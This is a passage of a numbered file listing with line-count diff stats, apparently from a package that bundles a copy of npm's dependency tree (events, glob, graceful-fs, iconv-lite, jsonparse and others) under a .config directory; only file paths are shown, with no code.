  916. package/.config/npm/node_global/lib/node_modules/npm/node_modules/err-code/test/test.js +159 -0
  917. package/.config/npm/node_global/lib/node_modules/npm/node_modules/event-target-shim/LICENSE +22 -0
  918. package/.config/npm/node_global/lib/node_modules/npm/node_modules/event-target-shim/dist/event-target-shim.js +871 -0
  919. package/.config/npm/node_global/lib/node_modules/npm/node_modules/event-target-shim/dist/event-target-shim.mjs +862 -0
  920. package/.config/npm/node_global/lib/node_modules/npm/node_modules/event-target-shim/dist/event-target-shim.umd.js +6 -0
  921. package/.config/npm/node_global/lib/node_modules/npm/node_modules/event-target-shim/package.json +82 -0
  922. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/.airtap.yml +15 -0
  923. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/History.md +118 -0
  924. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/LICENSE +22 -0
  925. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/events.js +497 -0
  926. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/package.json +37 -0
  927. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/security.md +10 -0
  928. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/add-listeners.js +111 -0
  929. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/check-listener-leaks.js +101 -0
  930. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/common.js +104 -0
  931. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/errors.js +13 -0
  932. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/events-list.js +28 -0
  933. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/events-once.js +234 -0
  934. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/index.js +64 -0
  935. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/legacy-compat.js +16 -0
  936. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/listener-count.js +37 -0
  937. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/listeners-side-effects.js +56 -0
  938. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/listeners.js +168 -0
  939. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/max-listeners.js +47 -0
  940. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/method-names.js +35 -0
  941. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/modify-in-emit.js +90 -0
  942. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/num-args.js +60 -0
  943. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/once.js +83 -0
  944. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/prepend.js +31 -0
  945. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/remove-all-listeners.js +133 -0
  946. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/remove-listeners.js +212 -0
  947. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/set-max-listeners-side-effects.js +31 -0
  948. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/special-event-names.js +45 -0
  949. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/subclass.js +66 -0
  950. package/.config/npm/node_global/lib/node_modules/npm/node_modules/events/tests/symbols.js +25 -0
  951. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/LICENSE +202 -0
  952. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/dist/backoff.js +118 -0
  953. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/dist/delay/always/always.delay.js +25 -0
  954. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/dist/delay/delay.base.js +45 -0
  955. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/dist/delay/delay.factory.js +17 -0
  956. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/dist/delay/delay.interface.js +3 -0
  957. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/dist/delay/skip-first/skip-first.delay.js +82 -0
  958. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/dist/jitter/full/full.jitter.js +8 -0
  959. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/dist/jitter/jitter.factory.js +15 -0
  960. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/dist/jitter/no/no.jitter.js +7 -0
  961. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/dist/options.js +31 -0
  962. package/.config/npm/node_global/lib/node_modules/npm/node_modules/exponential-backoff/package.json +61 -0
  963. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fastest-levenshtein/LICENSE.md +21 -0
  964. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fastest-levenshtein/bench.js +96 -0
  965. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fastest-levenshtein/esm/mod.js +138 -0
  966. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fastest-levenshtein/mod.js +142 -0
  967. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fastest-levenshtein/package.json +72 -0
  968. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fastest-levenshtein/test.js +55 -0
  969. package/.config/npm/node_global/lib/node_modules/npm/node_modules/foreground-child/LICENSE +15 -0
  970. package/.config/npm/node_global/lib/node_modules/npm/node_modules/foreground-child/dist/cjs/all-signals.js +58 -0
  971. package/.config/npm/node_global/lib/node_modules/npm/node_modules/foreground-child/dist/cjs/index.js +154 -0
  972. package/.config/npm/node_global/lib/node_modules/npm/node_modules/foreground-child/dist/cjs/package.json +3 -0
  973. package/.config/npm/node_global/lib/node_modules/npm/node_modules/foreground-child/dist/cjs/watchdog.js +43 -0
  974. package/.config/npm/node_global/lib/node_modules/npm/node_modules/foreground-child/dist/mjs/all-signals.js +52 -0
  975. package/.config/npm/node_global/lib/node_modules/npm/node_modules/foreground-child/dist/mjs/index.js +146 -0
  976. package/.config/npm/node_global/lib/node_modules/npm/node_modules/foreground-child/dist/mjs/package.json +3 -0
  977. package/.config/npm/node_global/lib/node_modules/npm/node_modules/foreground-child/dist/mjs/watchdog.js +39 -0
  978. package/.config/npm/node_global/lib/node_modules/npm/node_modules/foreground-child/package.json +83 -0
  979. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fs-minipass/LICENSE +15 -0
  980. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fs-minipass/lib/index.js +443 -0
  981. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fs-minipass/package.json +54 -0
  982. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fs.realpath/LICENSE +43 -0
  983. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fs.realpath/index.js +66 -0
  984. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fs.realpath/old.js +303 -0
  985. package/.config/npm/node_global/lib/node_modules/npm/node_modules/fs.realpath/package.json +26 -0
  986. package/.config/npm/node_global/lib/node_modules/npm/node_modules/function-bind/LICENSE +20 -0
  987. package/.config/npm/node_global/lib/node_modules/npm/node_modules/function-bind/implementation.js +52 -0
  988. package/.config/npm/node_global/lib/node_modules/npm/node_modules/function-bind/index.js +5 -0
  989. package/.config/npm/node_global/lib/node_modules/npm/node_modules/function-bind/package.json +63 -0
  990. package/.config/npm/node_global/lib/node_modules/npm/node_modules/function-bind/test/index.js +252 -0
  991. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/LICENSE.md +20 -0
  992. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/base-theme.js +18 -0
  993. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/error.js +24 -0
  994. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/has-color.js +4 -0
  995. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/index.js +289 -0
  996. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/plumbing.js +50 -0
  997. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/process.js +3 -0
  998. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/progress-bar.js +41 -0
  999. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/render-template.js +222 -0
  1000. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/set-immediate.js +7 -0
  1001. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/set-interval.js +3 -0
  1002. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/spin.js +5 -0
  1003. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/template-item.js +87 -0
  1004. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/theme-set.js +122 -0
  1005. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/themes.js +56 -0
  1006. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/lib/wide-truncate.js +31 -0
  1007. package/.config/npm/node_global/lib/node_modules/npm/node_modules/gauge/package.json +68 -0
  1008. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/LICENSE +15 -0
  1009. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/README.md +1212 -0
  1010. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/package.json +4 -0
  1011. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/bin.d.ts +3 -0
  1012. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/bin.d.ts.map +1 -0
  1013. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/bin.js +260 -0
  1014. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/bin.js.map +1 -0
  1015. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/glob.d.ts +344 -0
  1016. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/glob.d.ts.map +1 -0
  1017. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/glob.js +234 -0
  1018. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/glob.js.map +1 -0
  1019. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/has-magic.d.ts +14 -0
  1020. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/has-magic.d.ts.map +1 -0
  1021. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/has-magic.js +27 -0
  1022. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/has-magic.js.map +1 -0
  1023. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/ignore.d.ts +20 -0
  1024. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/ignore.d.ts.map +1 -0
  1025. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/ignore.js +103 -0
  1026. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/ignore.js.map +1 -0
  1027. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/index.d.ts +95 -0
  1028. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/index.d.ts.map +1 -0
  1029. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/index.js +68 -0
  1030. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/index.js.map +1 -0
  1031. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/pattern.d.ts +77 -0
  1032. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/pattern.d.ts.map +1 -0
  1033. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/pattern.js +219 -0
  1034. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/pattern.js.map +1 -0
  1035. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/processor.d.ts +59 -0
  1036. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/processor.d.ts.map +1 -0
  1037. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/processor.js +309 -0
  1038. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/processor.js.map +1 -0
  1039. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/walker.d.ts +96 -0
  1040. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/walker.d.ts.map +1 -0
  1041. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/walker.js +358 -0
  1042. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/cjs/src/walker.js.map +1 -0
  1043. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/glob.d.ts +344 -0
  1044. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/glob.d.ts.map +1 -0
  1045. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/glob.js +230 -0
  1046. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/glob.js.map +1 -0
  1047. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/has-magic.d.ts +14 -0
  1048. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/has-magic.d.ts.map +1 -0
  1049. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/has-magic.js +23 -0
  1050. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/has-magic.js.map +1 -0
  1051. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/ignore.d.ts +20 -0
  1052. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/ignore.d.ts.map +1 -0
  1053. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/ignore.js +99 -0
  1054. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/ignore.js.map +1 -0
  1055. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/index.d.ts +95 -0
  1056. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/index.d.ts.map +1 -0
  1057. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/index.js +56 -0
  1058. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/index.js.map +1 -0
  1059. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/package.json +4 -0
  1060. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/pattern.d.ts +77 -0
  1061. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/pattern.d.ts.map +1 -0
  1062. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/pattern.js +215 -0
  1063. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/pattern.js.map +1 -0
  1064. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/processor.d.ts +59 -0
  1065. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/processor.d.ts.map +1 -0
  1066. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/processor.js +302 -0
  1067. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/processor.js.map +1 -0
  1068. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/walker.d.ts +96 -0
  1069. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/walker.d.ts.map +1 -0
  1070. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/walker.js +352 -0
  1071. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/dist/mjs/walker.js.map +1 -0
  1072. package/.config/npm/node_global/lib/node_modules/npm/node_modules/glob/package.json +98 -0
  1073. package/.config/npm/node_global/lib/node_modules/npm/node_modules/graceful-fs/LICENSE +15 -0
  1074. package/.config/npm/node_global/lib/node_modules/npm/node_modules/graceful-fs/clone.js +23 -0
  1075. package/.config/npm/node_global/lib/node_modules/npm/node_modules/graceful-fs/graceful-fs.js +448 -0
  1076. package/.config/npm/node_global/lib/node_modules/npm/node_modules/graceful-fs/legacy-streams.js +118 -0
  1077. package/.config/npm/node_global/lib/node_modules/npm/node_modules/graceful-fs/package.json +53 -0
  1078. package/.config/npm/node_global/lib/node_modules/npm/node_modules/graceful-fs/polyfills.js +355 -0
  1079. package/.config/npm/node_global/lib/node_modules/npm/node_modules/has/LICENSE-MIT +22 -0
  1080. package/.config/npm/node_global/lib/node_modules/npm/node_modules/has/package.json +48 -0
  1081. package/.config/npm/node_global/lib/node_modules/npm/node_modules/has/src/index.js +5 -0
  1082. package/.config/npm/node_global/lib/node_modules/npm/node_modules/has/test/index.js +10 -0
  1083. package/.config/npm/node_global/lib/node_modules/npm/node_modules/has-unicode/LICENSE +14 -0
  1084. package/.config/npm/node_global/lib/node_modules/npm/node_modules/has-unicode/index.js +16 -0
  1085. package/.config/npm/node_global/lib/node_modules/npm/node_modules/has-unicode/package.json +30 -0
  1086. package/.config/npm/node_global/lib/node_modules/npm/node_modules/hosted-git-info/LICENSE +13 -0
  1087. package/.config/npm/node_global/lib/node_modules/npm/node_modules/hosted-git-info/lib/from-url.js +122 -0
  1088. package/.config/npm/node_global/lib/node_modules/npm/node_modules/hosted-git-info/lib/hosts.js +228 -0
  1089. package/.config/npm/node_global/lib/node_modules/npm/node_modules/hosted-git-info/lib/index.js +179 -0
  1090. package/.config/npm/node_global/lib/node_modules/npm/node_modules/hosted-git-info/lib/parse-url.js +78 -0
  1091. package/.config/npm/node_global/lib/node_modules/npm/node_modules/hosted-git-info/package.json +59 -0
  1092. package/.config/npm/node_global/lib/node_modules/npm/node_modules/http-cache-semantics/LICENSE +9 -0
  1093. package/.config/npm/node_global/lib/node_modules/npm/node_modules/http-cache-semantics/index.js +674 -0
  1094. package/.config/npm/node_global/lib/node_modules/npm/node_modules/http-cache-semantics/package.json +18 -0
  1095. package/.config/npm/node_global/lib/node_modules/npm/node_modules/http-proxy-agent/dist/agent.js +145 -0
  1096. package/.config/npm/node_global/lib/node_modules/npm/node_modules/http-proxy-agent/dist/index.js +14 -0
  1097. package/.config/npm/node_global/lib/node_modules/npm/node_modules/http-proxy-agent/package.json +57 -0
  1098. package/.config/npm/node_global/lib/node_modules/npm/node_modules/https-proxy-agent/dist/agent.js +177 -0
  1099. package/.config/npm/node_global/lib/node_modules/npm/node_modules/https-proxy-agent/dist/index.js +14 -0
  1100. package/.config/npm/node_global/lib/node_modules/npm/node_modules/https-proxy-agent/dist/parse-proxy-response.js +66 -0
  1101. package/.config/npm/node_global/lib/node_modules/npm/node_modules/https-proxy-agent/package.json +56 -0
  1102. package/.config/npm/node_global/lib/node_modules/npm/node_modules/humanize-ms/LICENSE +17 -0
  1103. package/.config/npm/node_global/lib/node_modules/npm/node_modules/humanize-ms/index.js +24 -0
  1104. package/.config/npm/node_global/lib/node_modules/npm/node_modules/humanize-ms/package.json +37 -0
  1105. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/LICENSE +21 -0
  1106. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/dbcs-codec.js +597 -0
  1107. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/dbcs-data.js +188 -0
  1108. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/index.js +23 -0
  1109. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/internal.js +198 -0
  1110. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/sbcs-codec.js +72 -0
  1111. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/sbcs-data-generated.js +451 -0
  1112. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/sbcs-data.js +179 -0
  1113. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/tables/big5-added.json +122 -0
  1114. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/tables/cp936.json +264 -0
  1115. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/tables/cp949.json +273 -0
  1116. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/tables/cp950.json +177 -0
  1117. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/tables/eucjp.json +182 -0
  1118. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/tables/gb18030-ranges.json +1 -0
  1119. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/tables/gbk-added.json +56 -0
  1120. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/tables/shiftjis.json +125 -0
  1121. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/utf16.js +197 -0
  1122. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/utf32.js +319 -0
  1123. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/encodings/utf7.js +290 -0
  1124. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/lib/bom-handling.js +52 -0
  1125. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/lib/index.js +180 -0
  1126. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/lib/streams.js +109 -0
  1127. package/.config/npm/node_global/lib/node_modules/npm/node_modules/iconv-lite/package.json +44 -0
  1128. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ieee754/LICENSE +11 -0
  1129. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ieee754/index.js +85 -0
  1130. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ieee754/package.json +52 -0
  1131. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ignore-walk/LICENSE +15 -0
  1132. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ignore-walk/lib/index.js +294 -0
  1133. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ignore-walk/package.json +63 -0
  1134. package/.config/npm/node_global/lib/node_modules/npm/node_modules/imurmurhash/imurmurhash.js +138 -0
  1135. package/.config/npm/node_global/lib/node_modules/npm/node_modules/imurmurhash/imurmurhash.min.js +12 -0
  1136. package/.config/npm/node_global/lib/node_modules/npm/node_modules/imurmurhash/package.json +40 -0
  1137. package/.config/npm/node_global/lib/node_modules/npm/node_modules/indent-string/index.js +35 -0
  1138. package/.config/npm/node_global/lib/node_modules/npm/node_modules/indent-string/license +9 -0
  1139. package/.config/npm/node_global/lib/node_modules/npm/node_modules/indent-string/package.json +37 -0
  1140. package/.config/npm/node_global/lib/node_modules/npm/node_modules/inflight/LICENSE +15 -0
  1141. package/.config/npm/node_global/lib/node_modules/npm/node_modules/inflight/inflight.js +54 -0
  1142. package/.config/npm/node_global/lib/node_modules/npm/node_modules/inflight/package.json +29 -0
  1143. package/.config/npm/node_global/lib/node_modules/npm/node_modules/inherits/LICENSE +16 -0
  1144. package/.config/npm/node_global/lib/node_modules/npm/node_modules/inherits/inherits.js +9 -0
  1145. package/.config/npm/node_global/lib/node_modules/npm/node_modules/inherits/inherits_browser.js +27 -0
  1146. package/.config/npm/node_global/lib/node_modules/npm/node_modules/inherits/package.json +29 -0
  1147. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ini/LICENSE +15 -0
  1148. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ini/lib/ini.js +278 -0
  1149. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ini/package.json +45 -0
  1150. package/.config/npm/node_global/lib/node_modules/npm/node_modules/init-package-json/LICENSE.md +18 -0
  1151. package/.config/npm/node_global/lib/node_modules/npm/node_modules/init-package-json/lib/default-input.js +262 -0
  1152. package/.config/npm/node_global/lib/node_modules/npm/node_modules/init-package-json/lib/init-package-json.js +145 -0
  1153. package/.config/npm/node_global/lib/node_modules/npm/node_modules/init-package-json/package.json +68 -0
  1154. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ip/lib/ip.js +422 -0
  1155. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ip/package.json +25 -0
  1156. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ip-regex/index.js +36 -0
  1157. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ip-regex/license +9 -0
  1158. package/.config/npm/node_global/lib/node_modules/npm/node_modules/ip-regex/package.json +44 -0
  1159. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-cidr/LICENSE +22 -0
  1160. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-cidr/index.js +9 -0
  1161. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-cidr/package.json +46 -0
  1162. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-core-module/LICENSE +20 -0
  1163. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-core-module/core.json +158 -0
  1164. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-core-module/index.js +69 -0
  1165. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-core-module/package.json +73 -0
  1166. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-core-module/test/index.js +133 -0
  1167. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-fullwidth-code-point/index.js +50 -0
  1168. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-fullwidth-code-point/license +9 -0
  1169. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-fullwidth-code-point/package.json +42 -0
  1170. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-lambda/LICENSE +21 -0
  1171. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-lambda/index.js +6 -0
  1172. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-lambda/package.json +35 -0
  1173. package/.config/npm/node_global/lib/node_modules/npm/node_modules/is-lambda/test.js +16 -0
  1174. package/.config/npm/node_global/lib/node_modules/npm/node_modules/isexe/LICENSE +15 -0
  1175. package/.config/npm/node_global/lib/node_modules/npm/node_modules/isexe/index.js +57 -0
  1176. package/.config/npm/node_global/lib/node_modules/npm/node_modules/isexe/mode.js +41 -0
  1177. package/.config/npm/node_global/lib/node_modules/npm/node_modules/isexe/package.json +31 -0
  1178. package/.config/npm/node_global/lib/node_modules/npm/node_modules/isexe/test/basic.js +221 -0
  1179. package/.config/npm/node_global/lib/node_modules/npm/node_modules/isexe/windows.js +42 -0
  1180. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jackspeak/LICENSE.md +55 -0
  1181. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jackspeak/dist/cjs/index.js +723 -0
  1182. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jackspeak/dist/cjs/package.json +3 -0
  1183. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jackspeak/dist/cjs/parse-args.js +42 -0
  1184. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jackspeak/dist/mjs/index.js +713 -0
  1185. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jackspeak/dist/mjs/package.json +3 -0
  1186. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jackspeak/dist/mjs/parse-args.js +19 -0
  1187. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jackspeak/package.json +98 -0
  1188. package/.config/npm/node_global/lib/node_modules/npm/node_modules/json-parse-even-better-errors/LICENSE.md +25 -0
  1189. package/.config/npm/node_global/lib/node_modules/npm/node_modules/json-parse-even-better-errors/lib/index.js +129 -0
  1190. package/.config/npm/node_global/lib/node_modules/npm/node_modules/json-parse-even-better-errors/package.json +48 -0
  1191. package/.config/npm/node_global/lib/node_modules/npm/node_modules/json-stringify-nice/LICENSE +15 -0
  1192. package/.config/npm/node_global/lib/node_modules/npm/node_modules/json-stringify-nice/index.js +38 -0
  1193. package/.config/npm/node_global/lib/node_modules/npm/node_modules/json-stringify-nice/package.json +40 -0
  1194. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/LICENSE +24 -0
  1195. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/bench.js +26 -0
  1196. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/examples/twitterfeed.js +30 -0
  1197. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/jsonparse.js +413 -0
  1198. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/package.json +22 -0
  1199. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/samplejson/basic.json +167 -0
  1200. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/samplejson/basic2.json +180 -0
  1201. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/test/big-token.js +24 -0
  1202. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/test/boundary.js +110 -0
  1203. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/test/offset.js +67 -0
  1204. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/test/primitives.js +57 -0
  1205. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/test/surrogate.js +26 -0
  1206. package/.config/npm/node_global/lib/node_modules/npm/node_modules/jsonparse/test/unvalid.js +15 -0
